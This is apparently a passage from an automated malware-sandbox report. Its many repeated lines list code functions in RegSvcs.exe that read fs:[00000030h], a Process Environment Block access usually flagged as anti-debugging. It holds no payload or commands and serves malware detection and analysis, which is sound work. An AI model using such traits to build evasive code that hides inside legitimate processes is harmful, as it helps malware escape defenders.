Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A105A7 mov eax, dword ptr fs:[00000030h]	9_2_01A105A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019C4588 mov eax, dword ptr fs:[00000030h]	9_2_019C4588
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01992582 mov eax, dword ptr fs:[00000030h]	9_2_01992582
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01992582 mov ecx, dword ptr fs:[00000030h]	9_2_01992582
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019B45B1 mov eax, dword ptr fs:[00000030h]	9_2_019B45B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019B45B1 mov eax, dword ptr fs:[00000030h]	9_2_019B45B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019965D0 mov eax, dword ptr fs:[00000030h]	9_2_019965D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019CA5D0 mov eax, dword ptr fs:[00000030h]	9_2_019CA5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019CA5D0 mov eax, dword ptr fs:[00000030h]	9_2_019CA5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019CE5CF mov eax, dword ptr fs:[00000030h]	9_2_019CE5CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019CE5CF mov eax, dword ptr fs:[00000030h]	9_2_019CE5CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019CC5ED mov eax, dword ptr fs:[00000030h]	9_2_019CC5ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019CC5ED mov eax, dword ptr fs:[00000030h]	9_2_019CC5ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019925E0 mov eax, dword ptr fs:[00000030h]	9_2_019925E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019BE5E7 mov eax, dword ptr fs:[00000030h]	9_2_019BE5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019BE5E7 mov eax, dword ptr fs:[00000030h]	9_2_019BE5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019BE5E7 mov eax, dword ptr fs:[00000030h]	9_2_019BE5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019BE5E7 mov eax, dword ptr fs:[00000030h]	9_2_019BE5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019BE5E7 mov eax, dword ptr fs:[00000030h]	9_2_019BE5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019BE5E7 mov eax, dword ptr fs:[00000030h]	9_2_019BE5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019BE5E7 mov eax, dword ptr fs:[00000030h]	9_2_019BE5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019BE5E7 mov eax, dword ptr fs:[00000030h]	9_2_019BE5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A26500 mov eax, dword ptr fs:[00000030h]	9_2_01A26500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019BE53E mov eax, dword ptr fs:[00000030h]	9_2_019BE53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019BE53E mov eax, dword ptr fs:[00000030h]	9_2_019BE53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019BE53E mov eax, dword ptr fs:[00000030h]	9_2_019BE53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019BE53E mov eax, dword ptr fs:[00000030h]	9_2_019BE53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019BE53E mov eax, dword ptr fs:[00000030h]	9_2_019BE53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A64500 mov eax, dword ptr fs:[00000030h]	9_2_01A64500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A64500 mov eax, dword ptr fs:[00000030h]	9_2_01A64500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A64500 mov eax, dword ptr fs:[00000030h]	9_2_01A64500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A64500 mov eax, dword ptr fs:[00000030h]	9_2_01A64500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A64500 mov eax, dword ptr fs:[00000030h]	9_2_01A64500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A64500 mov eax, dword ptr fs:[00000030h]	9_2_01A64500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A64500 mov eax, dword ptr fs:[00000030h]	9_2_01A64500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019A0535 mov eax, dword ptr fs:[00000030h]	9_2_019A0535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019A0535 mov eax, dword ptr fs:[00000030h]	9_2_019A0535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019A0535 mov eax, dword ptr fs:[00000030h]	9_2_019A0535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019A0535 mov eax, dword ptr fs:[00000030h]	9_2_019A0535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019A0535 mov eax, dword ptr fs:[00000030h]	9_2_019A0535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019A0535 mov eax, dword ptr fs:[00000030h]	9_2_019A0535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01998550 mov eax, dword ptr fs:[00000030h]	9_2_01998550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01998550 mov eax, dword ptr fs:[00000030h]	9_2_01998550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019C656A mov eax, dword ptr fs:[00000030h]	9_2_019C656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019C656A mov eax, dword ptr fs:[00000030h]	9_2_019C656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019C656A mov eax, dword ptr fs:[00000030h]	9_2_019C656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A1A4B0 mov eax, dword ptr fs:[00000030h]	9_2_01A1A4B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019C44B0 mov ecx, dword ptr fs:[00000030h]	9_2_019C44B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019964AB mov eax, dword ptr fs:[00000030h]	9_2_019964AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A4A49A mov eax, dword ptr fs:[00000030h]	9_2_01A4A49A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019904E5 mov ecx, dword ptr fs:[00000030h]	9_2_019904E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A16420 mov eax, dword ptr fs:[00000030h]	9_2_01A16420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A16420 mov eax, dword ptr fs:[00000030h]	9_2_01A16420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A16420 mov eax, dword ptr fs:[00000030h]	9_2_01A16420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A16420 mov eax, dword ptr fs:[00000030h]	9_2_01A16420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A16420 mov eax, dword ptr fs:[00000030h]	9_2_01A16420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A16420 mov eax, dword ptr fs:[00000030h]	9_2_01A16420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A16420 mov eax, dword ptr fs:[00000030h]	9_2_01A16420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019C8402 mov eax, dword ptr fs:[00000030h]	9_2_019C8402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019C8402 mov eax, dword ptr fs:[00000030h]	9_2_019C8402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019C8402 mov eax, dword ptr fs:[00000030h]	9_2_019C8402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019CA430 mov eax, dword ptr fs:[00000030h]	9_2_019CA430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0198E420 mov eax, dword ptr fs:[00000030h]	9_2_0198E420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0198E420 mov eax, dword ptr fs:[00000030h]	9_2_0198E420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0198E420 mov eax, dword ptr fs:[00000030h]	9_2_0198E420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0198C427 mov eax, dword ptr fs:[00000030h]	9_2_0198C427
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019B245A mov eax, dword ptr fs:[00000030h]	9_2_019B245A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A1C460 mov ecx, dword ptr fs:[00000030h]	9_2_01A1C460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0198645D mov eax, dword ptr fs:[00000030h]	9_2_0198645D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019CE443 mov eax, dword ptr fs:[00000030h]	9_2_019CE443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019CE443 mov eax, dword ptr fs:[00000030h]	9_2_019CE443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019CE443 mov eax, dword ptr fs:[00000030h]	9_2_019CE443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019CE443 mov eax, dword ptr fs:[00000030h]	9_2_019CE443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019CE443 mov eax, dword ptr fs:[00000030h]	9_2_019CE443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019CE443 mov eax, dword ptr fs:[00000030h]	9_2_019CE443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019CE443 mov eax, dword ptr fs:[00000030h]	9_2_019CE443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019CE443 mov eax, dword ptr fs:[00000030h]	9_2_019CE443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019BA470 mov eax, dword ptr fs:[00000030h]	9_2_019BA470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019BA470 mov eax, dword ptr fs:[00000030h]	9_2_019BA470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019BA470 mov eax, dword ptr fs:[00000030h]	9_2_019BA470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A4A456 mov eax, dword ptr fs:[00000030h]	9_2_01A4A456
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A447A0 mov eax, dword ptr fs:[00000030h]	9_2_01A447A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A3678E mov eax, dword ptr fs:[00000030h]	9_2_01A3678E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019907AF mov eax, dword ptr fs:[00000030h]	9_2_019907AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A1E7E1 mov eax, dword ptr fs:[00000030h]	9_2_01A1E7E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0199C7C0 mov eax, dword ptr fs:[00000030h]	9_2_0199C7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A107C3 mov eax, dword ptr fs:[00000030h]	9_2_01A107C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019947FB mov eax, dword ptr fs:[00000030h]	9_2_019947FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019947FB mov eax, dword ptr fs:[00000030h]	9_2_019947FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019B27ED mov eax, dword ptr fs:[00000030h]	9_2_019B27ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019B27ED mov eax, dword ptr fs:[00000030h]	9_2_019B27ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019B27ED mov eax, dword ptr fs:[00000030h]	9_2_019B27ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01990710 mov eax, dword ptr fs:[00000030h]	9_2_01990710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019C0710 mov eax, dword ptr fs:[00000030h]	9_2_019C0710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A0C730 mov eax, dword ptr fs:[00000030h]	9_2_01A0C730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019CC700 mov eax, dword ptr fs:[00000030h]	9_2_019CC700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019C273C mov eax, dword ptr fs:[00000030h]	9_2_019C273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019C273C mov ecx, dword ptr fs:[00000030h]	9_2_019C273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019C273C mov eax, dword ptr fs:[00000030h]	9_2_019C273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019CC720 mov eax, dword ptr fs:[00000030h]	9_2_019CC720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019CC720 mov eax, dword ptr fs:[00000030h]	9_2_019CC720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01990750 mov eax, dword ptr fs:[00000030h]	9_2_01990750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019D2750 mov eax, dword ptr fs:[00000030h]	9_2_019D2750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019D2750 mov eax, dword ptr fs:[00000030h]	9_2_019D2750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019C674D mov esi, dword ptr fs:[00000030h]	9_2_019C674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019C674D mov eax, dword ptr fs:[00000030h]	9_2_019C674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019C674D mov eax, dword ptr fs:[00000030h]	9_2_019C674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01998770 mov eax, dword ptr fs:[00000030h]	9_2_01998770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019A0770 mov eax, dword ptr fs:[00000030h]	9_2_019A0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019A0770 mov eax, dword ptr fs:[00000030h]	9_2_019A0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019A0770 mov eax, dword ptr fs:[00000030h]	9_2_019A0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019A0770 mov eax, dword ptr fs:[00000030h]	9_2_019A0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019A0770 mov eax, dword ptr fs:[00000030h]	9_2_019A0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019A0770 mov eax, dword ptr fs:[00000030h]	9_2_019A0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019A0770 mov eax, dword ptr fs:[00000030h]	9_2_019A0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019A0770 mov eax, dword ptr fs:[00000030h]	9_2_019A0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019A0770 mov eax, dword ptr fs:[00000030h]	9_2_019A0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019A0770 mov eax, dword ptr fs:[00000030h]	9_2_019A0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019A0770 mov eax, dword ptr fs:[00000030h]	9_2_019A0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019A0770 mov eax, dword ptr fs:[00000030h]	9_2_019A0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A14755 mov eax, dword ptr fs:[00000030h]	9_2_01A14755
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A1E75D mov eax, dword ptr fs:[00000030h]	9_2_01A1E75D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01994690 mov eax, dword ptr fs:[00000030h]	9_2_01994690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01994690 mov eax, dword ptr fs:[00000030h]	9_2_01994690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019C66B0 mov eax, dword ptr fs:[00000030h]	9_2_019C66B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019CC6A6 mov eax, dword ptr fs:[00000030h]	9_2_019CC6A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A106F1 mov eax, dword ptr fs:[00000030h]	9_2_01A106F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A106F1 mov eax, dword ptr fs:[00000030h]	9_2_01A106F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A0E6F2 mov eax, dword ptr fs:[00000030h]	9_2_01A0E6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A0E6F2 mov eax, dword ptr fs:[00000030h]	9_2_01A0E6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A0E6F2 mov eax, dword ptr fs:[00000030h]	9_2_01A0E6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A0E6F2 mov eax, dword ptr fs:[00000030h]	9_2_01A0E6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019CA6C7 mov ebx, dword ptr fs:[00000030h]	9_2_019CA6C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019CA6C7 mov eax, dword ptr fs:[00000030h]	9_2_019CA6C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019D2619 mov eax, dword ptr fs:[00000030h]	9_2_019D2619
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019A260B mov eax, dword ptr fs:[00000030h]	9_2_019A260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019A260B mov eax, dword ptr fs:[00000030h]	9_2_019A260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019A260B mov eax, dword ptr fs:[00000030h]	9_2_019A260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019A260B mov eax, dword ptr fs:[00000030h]	9_2_019A260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019A260B mov eax, dword ptr fs:[00000030h]	9_2_019A260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019A260B mov eax, dword ptr fs:[00000030h]	9_2_019A260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019A260B mov eax, dword ptr fs:[00000030h]	9_2_019A260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A0E609 mov eax, dword ptr fs:[00000030h]	9_2_01A0E609
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0199262C mov eax, dword ptr fs:[00000030h]	9_2_0199262C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019C6620 mov eax, dword ptr fs:[00000030h]	9_2_019C6620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019C8620 mov eax, dword ptr fs:[00000030h]	9_2_019C8620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019AE627 mov eax, dword ptr fs:[00000030h]	9_2_019AE627
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A5866E mov eax, dword ptr fs:[00000030h]	9_2_01A5866E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A5866E mov eax, dword ptr fs:[00000030h]	9_2_01A5866E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019AC640 mov eax, dword ptr fs:[00000030h]	9_2_019AC640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019C2674 mov eax, dword ptr fs:[00000030h]	9_2_019C2674
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019CA660 mov eax, dword ptr fs:[00000030h]	9_2_019CA660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019CA660 mov eax, dword ptr fs:[00000030h]	9_2_019CA660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A189B3 mov esi, dword ptr fs:[00000030h]	9_2_01A189B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A189B3 mov eax, dword ptr fs:[00000030h]	9_2_01A189B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A189B3 mov eax, dword ptr fs:[00000030h]	9_2_01A189B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019909AD mov eax, dword ptr fs:[00000030h]	9_2_019909AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019909AD mov eax, dword ptr fs:[00000030h]	9_2_019909AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019A29A0 mov eax, dword ptr fs:[00000030h]	9_2_019A29A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019A29A0 mov eax, dword ptr fs:[00000030h]	9_2_019A29A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019A29A0 mov eax, dword ptr fs:[00000030h]	9_2_019A29A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019A29A0 mov eax, dword ptr fs:[00000030h]	9_2_019A29A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019A29A0 mov eax, dword ptr fs:[00000030h]	9_2_019A29A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019A29A0 mov eax, dword ptr fs:[00000030h]	9_2_019A29A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019A29A0 mov eax, dword ptr fs:[00000030h]	9_2_019A29A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019A29A0 mov eax, dword ptr fs:[00000030h]	9_2_019A29A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019A29A0 mov eax, dword ptr fs:[00000030h]	9_2_019A29A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019A29A0 mov eax, dword ptr fs:[00000030h]	9_2_019A29A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019A29A0 mov eax, dword ptr fs:[00000030h]	9_2_019A29A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019A29A0 mov eax, dword ptr fs:[00000030h]	9_2_019A29A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019A29A0 mov eax, dword ptr fs:[00000030h]	9_2_019A29A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A1E9E0 mov eax, dword ptr fs:[00000030h]	9_2_01A1E9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0199A9D0 mov eax, dword ptr fs:[00000030h]	9_2_0199A9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0199A9D0 mov eax, dword ptr fs:[00000030h]	9_2_0199A9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0199A9D0 mov eax, dword ptr fs:[00000030h]	9_2_0199A9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0199A9D0 mov eax, dword ptr fs:[00000030h]	9_2_0199A9D0
